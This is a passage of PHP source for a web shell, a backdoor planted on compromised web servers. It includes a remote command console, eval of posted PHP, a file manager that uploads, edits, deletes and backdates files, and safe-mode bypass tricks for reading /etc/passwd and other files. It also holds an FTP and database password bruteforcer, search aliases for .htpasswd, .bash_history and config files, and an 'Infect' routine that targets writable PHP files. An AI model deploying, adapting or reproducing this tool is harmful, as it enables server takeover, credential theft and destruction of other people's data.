\';\r\n }\r\n break;\r\n case \'chmod\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms))\r\n echo \'Can\\\'t set permissions!
\';\r\n }\r\n clearstatcache();\r\n echo \'
\';\r\n break;\r\n case \'edit\':\r\n if( !is_writable($_POST[\'p1\'])) {\r\n echo \'File isn\\\'t writeable\';\r\n break;\r\n }\r\n if( !empty($_POST[\'p3\']) ) {\r\n $time = @filemtime($_POST[\'p1\']);\r\n $_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n $fp = @fopen($_POST[\'p1\'],"w");\r\n if($fp) {\r\n @fwrite($fp,$_POST[\'p3\']);\r\n @fclose($fp);\r\n echo \'Saved!
\';\r\n @touch($_POST[\'p1\'],$time,$time);\r\n }\r\n }\r\n echo \'
\';\r\n break;\r\n case \'hexdump\':\r\n $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000
\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0; $i<$len; ++$i) {\r\n $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) {\r\n case 0: $h[2] .= \' \'; break;\r\n case 9: $h[2] .= \' \'; break;\r\n case 10: $h[2] .= \' \'; break;\r\n case 13: $h[2] .= \' \'; break;\r\n default: $h[2] .= $c[$i]; break;\r\n }\r\n $n++;\r\n if ($n == 32) {\r\n $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}\r\n $h[1] .= \'
\';\r\n $h[2] .= "\\n";\r\n }\r\n }\r\n echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\';\r\n break;\r\n case \'rename\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n echo \'Can\\\'t rename!
\';\r\n else\r\n die(\'\');\r\n }\r\n echo \'
\';\r\n break;\r\n case \'touch\':\r\n if( !empty($_POST[\'p3\']) ) {\r\n $time = strtotime($_POST[\'p3\']);\r\n if($time) {\r\n if(!touch($_POST[\'p1\'],$time,$time))\r\n echo \'Fail!\';\r\n else\r\n echo \'Touched!\';\r\n } else echo \'Bad time format!\';\r\n }\r\n clearstatcache();\r\n echo \'
\';\r\n break;\r\n /* (С) 12.2015 mitryz */\r\n case \'frame\':\r\n $frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));\r\n if ($frameSrc[0] != \'/\')\r\n $frameSrc = \'/\' . $frameSrc;\r\n if ($frameSrc[strlen($frameSrc) - 1] != \'/\')\r\n $frameSrc = $frameSrc . \'/\';\r\n $frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);\r\n echo \'\';\r\n break;\r\n }\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nif($os == \'win\')\r\n $aliases = array(\r\n "List Directory" => "dir",\r\n "Find index.php in current dir" => "dir /s /w /b index.php",\r\n "Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n "Show active connections" => "netstat -an",\r\n "Show running services" => "net start",\r\n "User accounts" => "net user",\r\n "Show computers" => "net view",\r\n "ARP Table" => "arp -a",\r\n "IP Configuration" => "ipconfig /all"\r\n );\r\nelse\r\n $aliases = array(\r\n "List dir" => "ls -lha",\r\n "list file attributes on a Linux second extended file system" => "lsattr -va",\r\n "show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n "Find" => "",\r\n "find all suid files" => "find / -type f -perm -04000 -ls",\r\n "find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n "find all sgid files" => "find / -type f -perm -02000 -ls",\r\n "find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n "find config.inc.php files" => "find / -type f -name config.inc.php",\r\n "find config* files" => "find / -type f -name \\"config*\\"",\r\n "find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n "find all writable folders and files" => "find / -perm -2 -ls",\r\n "find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n "find all service.pwd files" => "find / -type f -name service.pwd",\r\n "find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n "find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n "find all .bash_history files" => "find / -type f -name .bash_history",\r\n "find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n "Locate" => "",\r\n "locate httpd.conf files" => "locate httpd.conf",\r\n "locate vhosts.conf files" => "locate vhosts.conf",\r\n "locate proftpd.conf files" => "locate proftpd.conf",\r\n "locate psybnc.conf files" => "locate psybnc.conf",\r\n "locate my.conf files" => "locate my.conf",\r\n "locate admin.php files" =>"locate admin.php",\r\n "locate cfg.php files" => "locate cfg.php",\r\n "locate conf.php files" => "locate conf.php",\r\n "locate config.dat files" => "locate config.dat",\r\n "locate config.php files" => "locate config.php",\r\n "locate config.inc files" => "locate config.inc",\r\n "locate config.inc.php" => "locate config.inc.php",\r\n "locate config.default.php files" => "locate config.default.php",\r\n "locate config* files " => "locate config",\r\n "locate .conf files"=>"locate \'.conf\'",\r\n "locate .pwd files" => "locate \'.pwd\'",\r\n "locate .sql files" => "locate \'.sql\'",\r\n "locate .htpasswd files" => "locate \'.htpasswd\'",\r\n "locate .bash_history files" => "locate \'.bash_history\'",\r\n "locate .mysql_history files" => "locate \'.mysql_history\'",\r\n "locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n "locate backup files" => "locate backup",\r\n "locate dump files" => "locate dump",\r\n "locate priv files" => "locate priv"\r\n );\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n if(isset($_POST[\'ajax\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n ob_start();\r\n echo "d.cf.cmd.value=\'\';\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match)) {\r\n if(@chdir($match[1])) {\r\n $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n }\r\n }\r\n echo "d.cf.output.value+=\'".$temp."\';";\r\n echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n }\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n hardHeader();\r\n echo "";\r\n echo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\';\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nfunction actionPhp() {\r\n if( isset($_POST[\'ajax\']) ) {\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit; \r\n }\r\n hardHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) {\r\n echo \'

PHP info

\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'

\';\r\n }\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'

Execution PHP-code

\';\r\n echo \' send using AJAX
\';\r\n    if(!empty($_POST[\'p1\'])) {\r\n        ob_start();\r\n        eval($_POST[\'p1\']);\r\n        echo htmlspecialchars(ob_get_clean());\r\n    }\r\n    echo \'
\';\r\n hardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n \r\n if(!empty($_POST[\'p1\'])) {\r\n switch($_POST[\'p1\']) {\r\n case \'uploadFile\':\r\n if ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {\r\n foreach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {\r\n if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {\r\n echo "Can\'t upload file!";\r\n }\r\n }\r\n }\r\n break;\r\n case \'mkdir\':\r\n if(!@mkdir($_POST[\'p2\']))\r\n echo "Can\'t create new dir";\r\n break;\r\n case \'delete\':\r\n function deleteDir($path) {\r\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($▟ = readdir($dh) ) !== false) {\r\n $▟ = $path.$▟;\r\n if ( (basename($▟) == "..") || (basename($▟) == ".") )\r\n continue;\r\n $type = filetype($▟);\r\n if ($type == "dir")\r\n deleteDir($▟);\r\n else\r\n @unlink($▟);\r\n }\r\n closedir($dh);\r\n @rmdir($path);\r\n }\r\n if(is_array(@$_POST[\'f\']))\r\n foreach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n $f = urldecode($f);\r\n if(is_dir($f))\r\n deleteDir($f);\r\n else\r\n @unlink($f);\r\n }\r\n break;\r\n case \'paste\':\r\n if($_COOKIE[\'act\'] == \'copy\') {\r\n function copy_paste($c,$s,$d){\r\n if(is_dir($c.$s)){\r\n mkdir($d.$s);\r\n $h = @opendir($c.$s);\r\n while (($f = @readdir($h)) !== false)\r\n if (($f != ".") and ($f != ".."))\r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } elseif(is_file($c.$s))\r\n @copy($c.$s, $d.$s);\r\n }\r\n foreach($_COOKIE[\'f\'] as $f)\r\n copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_COOKIE[\'act\'] == \'move\') {\r\n function move_paste($c,$s,$d){\r\n if(is_dir($c.$s)){\r\n mkdir($d.$s);\r\n $h = @opendir($c.$s);\r\n while (($f = @readdir($h)) !== false)\r\n if (($f != ".") and ($f != ".."))\r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } elseif(@is_file($c.$s))\r\n @copy($c.$s, $d.$s);\r\n }\r\n foreach($_COOKIE[\'f\'] as $f)\r\n @rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } elseif($_COOKIE[\'act\'] == \'zip\') {\r\n if(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n } elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n if(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n } elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n }\r\n unset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n break;\r\n default:\r\n if(!empty($_POST[\'p1\'])) {\r\n prototype(\'act\', $_POST[\'p1\']);\r\n prototype(\'f\', serialize(@$_POST[\'f\']));\r\n prototype(\'c\', @$_POST[\'c\']);\r\n }\r\n break;\r\n }\r\n }\r\n hardHeader();\r\n echo \'

File manager

\';\r\n $dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';hardFooter(); return; }\r\n global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) {\r\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n $sort = array($match[1], (int)$match[2]);\r\n }\r\necho "\r\n\r\n";\r\n $dirs = $files = array();\r\n $n = count($dirContent);\r\n for($i=0;$i<$n;$i++) {\r\n $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i],\r\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n );\r\n if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))\r\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n }\r\n $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) {\r\n if($GLOBALS[\'sort\'][0] != \'size\')\r\n return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n else\r\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n }\r\n usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n $files = array_merge($dirs, $files);\r\n $l = 0;\r\n foreach($files as $f) {\r\n echo \'\';\r\n $l = $l?0:1;\r\n }\r\n echo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\']\r\n .\'R T\'.(($f[\'type\']==\'file\')?\' F E D\':\'\').\'
\r\n \r\n \r\n \r\n \r\n ";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo " file name:  ";\r\n echo "
";\r\n hardFooter();\r\n}\r\nfunction actionStringTools() {\r\n if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\',\r\n \'Base64 decode\' => \'base64_decode\',\r\n \'Url encode\' => \'urlencode\',\r\n \'Url decode\' => \'urldecode\',\r\n \'Full urlencode\' => \'full_urlencode\',\r\n \'md5 hash\' => \'md5\',\r\n \'sha1 hash\' => \'sha1\',\r\n \'crypt\' => \'crypt\',\r\n \'CRC32\' => \'crc32\',\r\n \'ASCII to HEX\' => \'ascii2hex\',\r\n \'HEX to ASCII\' => \'hex2ascii\',\r\n \'HEX to DEC\' => \'hexdec\',\r\n \'HEX to BIN\' => \'hex2bin\',\r\n \'DEC to HEX\' => \'dechex\',\r\n \'DEC to BIN\' => \'decbin\',\r\n \'BIN to HEX\' => \'binhex\',\r\n \'BIN to DEC\' => \'bindec\',\r\n \'String to lower case\' => \'strtolower\',\r\n \'String to upper case\' => \'strtoupper\',\r\n \'Htmlspecialchars\' => \'htmlspecialchars\',\r\n \'String length\' => \'strlen\',\r\n );\r\n if(isset($_POST[\'ajax\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n ob_start();\r\n if(in_array($_POST[\'p1\'], $stringTools))\r\n echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n }\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n hardHeader();\r\n echo \'

String conversions

\';\r\n echo "
send using AJAX
";\r\n    if(!empty($_POST[\'p1\'])) {\r\n        if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n    }\r\n    echo"

Search files:

\r\n
\r\n \r\n \r\n \r\n \r\n
Text:
Path:
Name:
";\r\n function hardRecursiveGlob($path) {\r\n if(substr($path, -1) != \'/\')\r\n $path.=\'/\';\r\n $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n if(is_array($paths)&&@count($paths)) {\r\n foreach($paths as $▟) {\r\n if(@is_dir($▟)){\r\n if($path!=$▟)\r\n hardRecursiveGlob($▟);\r\n } else {\r\n if(empty($_POST[\'p2\']) || @strpos(file_get_contents($▟), $_POST[\'p2\'])!==false)\r\n echo "".htmlspecialchars($▟)."
";\r\n }\r\n }\r\n }\r\n }\r\n if(@$_POST[\'p3\'])\r\n hardRecursiveGlob($_POST[\'c\']);\r\n echo "

Search for hash:

\r\n
\r\n
\r\n \r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
";\r\n hardFooter();\r\n}\r\nfunction actionSafeMode() {\r\n $temp=\'\';\r\n ob_start();\r\n switch($_POST[\'p1\']) {\r\n case 1:\r\n $temp=@tempnam($test, \'cx\');\r\n if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){\r\n echo @file_get_contents($temp);\r\n unlink($temp);\r\n } else\r\n echo \'Sorry... Can\\\'t open file\';\r\n break;\r\n case 2:\r\n $files = glob($_POST[\'p2\'].\'*\');\r\n if( is_array($files) )\r\n foreach ($files as $filename)\r\n echo $filename."\\n";\r\n break;\r\n case 3:\r\n $ch = curl_init("file://".$_POST[\'p2\']."\\x00".SELF_PATH);\r\n curl_exec($ch);\r\n break;\r\n case 4:\r\n ini_restore("safe_mode");\r\n ini_restore("open_basedir");\r\n include($_POST[\'p2\']);\r\n break;\r\n case 5:\r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n $uid = @posix_getpwuid($_POST[\'p2\']);\r\n if ($uid)\r\n echo join(\':\',$uid)."\\n";\r\n }\r\n break;\r\n case 6:\r\n if(!function_exists(\'imap_open\'))break;\r\n $stream = imap_open($_POST[\'p2\'], "", "");\r\n if ($stream == FALSE)\r\n break;\r\n echo imap_body($stream, 1);\r\n imap_close($stream);\r\n break;\r\n }\r\n $temp = ob_get_clean();\r\n hardHeader();\r\n echo \'

Safe mode bypass

\';\r\n echo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
\';\r\n if($temp)\r\n echo \'
\'.$temp.\'
\';\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n die(\'bye!\');\r\n}\r\nfunction actionSelfRemove() {\r\n if($_POST[\'p1\'] == \'yes\')\r\n if(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n die(\'Shell has been removed\');\r\n else\r\n echo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n hardHeader();\r\n echo \'

Suicide

Really want to remove the shell?
Yes
\';\r\n hardFooter();\r\n}\r\nfunction actionInfect() {\r\n hardHeader();\r\n echo \'

Infect

\';\r\n if($_POST[\'p1\'] == \'infect\') {\r\n $target=$_SERVER[\'DOCUMENT_ROOT\'];\r\n function ListFiles($dir) {\r\n if($dh = opendir($dir)) {\r\n $files = Array();\r\n $inner_files = Array();\r\n while($file = readdir($dh)) {\r\n if($file != "." && $file != "..") {\r\n if(is_dir($dir . "/" . $file)) {\r\n $inner_files = ListFiles($dir . "/" . $file);\r\n if(is_array($inner_files)) $files = array_merge($files, $inner_files); \r\n } else {\r\n array_push($files, $dir . "/" . $file);\r\n }\r\n }\r\n }\r\n closedir($dh);\r\n return $files;\r\n }\r\n }\r\n foreach (ListFiles($target) as $key=>$file){\r\n $nFile = substr($file, -4, 4);\r\n if($nFile == ".php" ){\r\n if(($file<>$_SERVER[\'DOCUMENT_ROOT\'].$_SERVER[\'PHP_SELF\'])&&(is_writeable($file))){\r\n echo "$file
";\r\n $i++;\r\n }\r\n }\r\n }\r\n echo "$i";\r\n }else{\r\n echo "
";\r\n echo \'Really want to infect the server? Yes
\';\r\n }\r\n hardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n hardHeader();\r\n if( isset($_POST[\'proto\']) ) {\r\n echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\';\r\n if( $_POST[\'proto\'] == \'ftp\' ) {\r\n function bruteForce($ip,$port,$login,$pass) {\r\n $fp = @ftp_connect($ip, $port?$port:21);\r\n if(!$fp) return false;\r\n $res = @ftp_login($fp, $login, $pass);\r\n @ftp_close($fp);\r\n return $res;\r\n }\r\n } elseif( $_POST[\'proto\'] == \'mysql\' ) {\r\n function bruteForce($ip,$port,$login,$pass) {\r\n $res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\r\n @mysql_close($res);\r\n return $res;\r\n }\r\n } elseif( $_POST[\'proto\'] == \'pgsql\' ) {\r\n function bruteForce($ip,$port,$login,$pass) {\r\n $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\r\n $res = @pg_connect($str);\r\n @pg_close($res);\r\n return $res;\r\n }\r\n }\r\n $success = 0;\r\n $attempts = 0;\r\n $server = explode(":", $_POST[\'server\']);\r\n if($_POST[\'type\'] == 1) {\r\n $temp = @file(\'/etc/passwd\');\r\n if( is_array($temp) )\r\n foreach($temp as $line) {\r\n $line = explode(":", $line);\r\n ++$attempts;\r\n if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\r\n $success++;\r\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\';\r\n }\r\n if(@$_POST[\'reverse\']) {\r\n $tmp = "";\r\n for($i=strlen($line[0])-1; $i>=0; --$i)\r\n $tmp .= $line[0][$i];\r\n ++$attempts;\r\n if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n $success++;\r\n echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);\r\n }\r\n }\r\n }\r\n } elseif($_POST[\'type\'] == 2) {\r\n $temp = @file($_POST[\'dict\']);\r\n if( is_array($temp) )\r\n foreach($temp as $line) {\r\n $line = trim($line);\r\n ++$attempts;\r\n if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n $success++;\r\n echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';\r\n }\r\n }\r\n }\r\n echo "Attempts: $attempts Success: $success

";\r\n }\r\n echo \'

FTP bruteforce

\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'
Type
\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'\'\r\n .\'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
\'\r\n .\'\'\r\n .\'\'\r\n .\'
Login
Dictionary
\'\r\n .\'
\';\r\n echo \'
\';\r\n hardFooter();\r\n}\r\nfunction actionSql() {\r\n class DbClass {\r\n var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) {\r\n $this->type = $type;\r\n }\r\n function connect($host, $user, $pass, $dbname){\r\n switch($this->type) {\r\n case \'mysql\':\r\n if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\':\r\n $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n }\r\n return false;\r\n }\r\n function selectdb($db) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n if (@mysql_select_db($db))return true;\r\n break;\r\n }\r\n return false;\r\n }\r\n function query($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\':\r\n return $this->res = @pg_query($this->link,$str);\r\n break;\r\n }\r\n return false;\r\n }\r\n function fetch() {\r\n $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) {\r\n case \'mysql\':\r\n return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\':\r\n return @pg_fetch_assoc($res);\r\n break;\r\n }\r\n return false;\r\n }\r\n function listDbs() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->query("SHOW databases");\r\n break;\r\n case \'pgsql\':\r\n return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n break;\r\n }\r\n return false;\r\n }\r\n function listTables() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\':\r\n return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n break;\r\n }\r\n return false;\r\n }\r\n function error() {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return @mysql_error();\r\n break;\r\n case \'pgsql\':\r\n return @pg_last_error();\r\n break;\r\n }\r\n return false;\r\n }\r\n function setCharset($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n if(function_exists(\'mysql_set_charset\'))\r\n return @mysql_set_charset($str, $this->link);\r\n else\r\n $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'pgsql\':\r\n return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n }\r\n return false;\r\n }\r\n function loadFile($str) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n break;\r\n case \'pgsql\':\r\n $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM \'".addslashes($str)."\';select file from hard2;");\r\n $r=array();\r\n while($i=$this->fetch())\r\n $r[] = $i[\'file\'];\r\n $this->query(\'drop table hard2\');\r\n return array(\'file\'=>implode("\\n",$r));\r\n break;\r\n }\r\n return false;\r\n }\r\n function dump($table, $fp = false) {\r\n switch($this->type) {\r\n case \'mysql\':\r\n $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n $sql = $create[1].";\\n";\r\n if($fp) 